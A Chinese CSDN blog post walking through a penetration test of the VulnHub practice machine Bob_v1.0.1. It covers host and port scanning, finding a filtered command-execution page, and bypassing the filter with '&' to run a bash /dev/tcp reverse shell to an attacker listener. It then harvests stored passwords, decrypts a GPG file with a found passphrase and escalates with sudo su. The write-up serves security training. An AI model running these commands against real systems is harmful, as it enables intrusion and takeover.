Bob_v1.0.1靶机渗透测试

最新推荐文章于 2024-08-03 21:20:25 发布
最新推荐文章于 2024-08-03 21:20:25 发布
阅读量170 收藏 5
点赞数 2
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140897140
版权

一、靶机下载地址

https://www.vulnhub.com/entry/bob-101,226/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:07:A6:D9'

2、指纹识别

# 使用命令
whatweb 192.168.145.185

3、端口扫描

# 使用命令
nmap 192.168.145.185 -p- -sV

4、目录扫描

# 使用命令
dirsearch -u "http://192.168.145.185"

三、获取shell

1、访问靶机IP地址,到处点了点,没有什么发现

2、拼接并访问/robots.txt文件

3、 逐个拼接访问,发现dev_shell.php,是一个命令执行的界面

4、执行whoami | ls命令发现了一个备份文件

5、将备份文件下载下来,发现了过滤规则

6、 尝试执行反弹shell的命令,反弹shell

# kali开启监听
nc -lvnp 5555

# 反弹shell
pwd&echo "bash -i >& /dev/tcp/192.168.145.146/5555 0>&1" | bash

7、成功获取到shell

四、提权

1、 切换到home目录下查看,发现有四个用户的家目录

# 使用命令
cd /home

ls

2、 到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html 

# 使用命令
cd bob
ls -al

3、查看.old_passwordfile.html文件,得到账号和密码

# 使用命令
cat  .old_passwordfile.html

4、 在 Documents目录下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

# 使用命令
cd Documents

ls

5、 在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh 文件

6、查看 notes.sh文件内容,没看懂,上网查阅了资料,说是藏头诗,密钥为 HARPOCRATES

# 使用命令
cat notes.sh

7、 对login.txt.gpg文件进行解密,发现没有权限

# 使用命令
gpg -d login.txt.gpg

8、 ssh登录其他用户尝试 , 得到 bob 的密码

# 使用命令
ssh jc@192.168.145.185 -p 25468

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

9、使用ssh登录bob用户

# 使用命令
ssh bob@192.168.145.185 -p 25468

10、输入sudo -l查看可执行的命令,发现所命令都可以

11、输入命令进行提权,提权成功

# 使用命令
sudo su

果冻*果冻*
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
DSVideo_Go_v1.0.1.apk
08-02
安装AndroidTV版的群晖官方DSVideo之后桌面上不生成图标,这个apk就是一个引导程序,安装这个apk之后,桌面上出现DSVideo的图标,点击后引导启动官方DSVideo。
vulnhub靶场,Bob_v1.0.1
kukudeshuo的博客
08-27 955
vulnhub靶场,Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 931
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 244
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
VulnHub:Bob 1.0.1靶机实战
Aukum的博客
07-08 773
VulnHub-Bob 1.0.1靶机。通过常规信息收集,借助&符号绕过过滤,通过命令执行进行反弹shell。主要考察的是Linux shell基础和信息收集能力。
VulnHub-Bob靶机详细渗透过程
MRS_jianai的博客
12-27 838
VulnHub-Bob靶机详细渗透过程
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1980
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1549
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1127
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
BOB: 1.0.1
Sam5ara的博客
08-15 170
直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式。
TFT35_V1.0.1_中文
05-25
TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_...
stm32f3_I2C_Timing_Configuration_V1.0.1
03-31
配置stm32f3的IIC,可以通过工具设置上升沿,下降沿的时间,IIC的频率。
I2C_Timing_Configuration_V1.0.1.xls
08-24
stm32f0硬件I2C_Timing配置工具,来源ST官网:...
web安全之简要sql注入
weixin_73185660的博客
08-01 953
举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。如果是1=1,那么就是真且真,结果为真。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1625
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
构建网络安全的坚实基石:深入解析NIST与ISO 27001框架
最新发布
2401_85341950的博客
08-03 530
网络安全框架是一套指南和最佳实践,用于帮助组织评估、设计、实施和维护其网络安全策略。这些框架通常包括识别、保护、检测、响应和恢复五个核心功能。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 859
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
hc32f030_ide_rev1.0.1
06-06
### 回答1: hc32f030_ide_rev1.0.1是一款集成开发环境(IDE),用于hc32f030系列单片机的开发。它由华大基础(HDP)公司开发,可用于Windows操作系统。hc32f030_ide_rev1.0.1提供了代码编辑、编译、调试等功能,支持多种编程语言,包括C语言和汇编语言。此外,它还支持多种单片机设备和外部模块、接口的配置,如ADC模块、串行通信模块等。hc32f030_ide_rev1.0.1采用图形化界面,用户可以直观地看到当前工程的结构,方便编写代码和调试程序。此外,hc32f030_ide_rev1.0.1还提供了丰富的API库,包括IO口操作、定时器操作、中断操作等,为用户开发的程序提供了丰富的工具和支持。综上所述,hc32f030_ide_rev1.0.1是一款方便、易用、功能强大的单片机开发工具,极大地提高了用户的开发效率和程序运行的可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值